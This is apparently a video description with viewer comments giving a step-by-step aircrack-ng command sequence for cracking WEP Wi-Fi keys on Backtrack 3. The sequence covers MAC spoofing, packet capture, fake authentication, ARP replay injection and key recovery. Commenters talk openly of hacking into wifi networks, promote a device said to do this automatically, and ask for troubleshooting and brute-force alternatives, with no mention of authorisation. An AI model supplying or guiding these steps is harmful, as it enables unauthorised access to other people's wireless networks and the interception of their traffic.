This is a video that i'm cracking a WEP wireless Key with Backtrack 3. By : shu jie
I have a "NetgearWG111v2" usb key to connect to a wireless connection. I buy it on Ebay.

Steps to crack WEP key :
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
what u need is the essid, ch, bssid.data
copy bssid
airodump-ng -c (the channel) -w wep --bssid(copy bssid) wlan0
open new konsole
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
start reading packets when data got to 100k
open new konsole
aircrack-ng wep-01.cap

I just saw this video regarding how to hack and get access to a wifi network with WEP key encryption. Did you all don't know that there is a router that do all this by it self? It is called "wifi freedom", I just bought one a couple of weeks ago. You don't need to install any software, drivers or anything just connected to a computer thru USB select the network you want to hack and wait a couple of minutes, then it will give you the key. on the aireplay-ng -3 -b (bssid) last step before aircrack-ng, how come mines jus say..READ xxxx packets (got ) ARP requests and 0 ACK's) sent 0 packets and first shell konsole, the # data doesnt move???

is it possible to not have to get 30k packets of data and just have backtrack do an attack similar to a dictionary attack for WPA, but it puts in all the hexadecimal combos possible?

i used these commands but it is taking very long time i waited for 5 hours.
